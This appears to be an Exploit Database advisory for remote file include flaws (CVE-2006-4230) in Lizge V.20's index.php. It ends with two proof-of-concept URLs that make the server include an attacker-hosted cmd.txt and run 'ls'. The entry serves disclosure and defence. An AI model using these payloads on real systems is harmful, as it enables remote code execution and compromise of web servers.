Lizge 20 - Index.PHP Multiple Remote File Include Vulnerabilities

2006-08-15T00:00:00
ID EDB-ID:28390
Type exploitdb
Reporter Crackers_Child
Modified 2006-08-15T00:00:00

Description

Lizge V.20 Index.PHP Multiple Remote File Include Vulnerabilities. CVE-2006-4230. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/19533/info

Lizge is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Version V.20 is vulnerable to these issues; other versions may also be affected.

http://www.example.com/[target]/[lizge_path]//index.php?lizge=http://www.example.com/cmd.txt?&cmd=ls http://www.example.com/[target]/[lizges_path]//index.php?bade=http://www.example.com/cmd.txt?&cmd=ls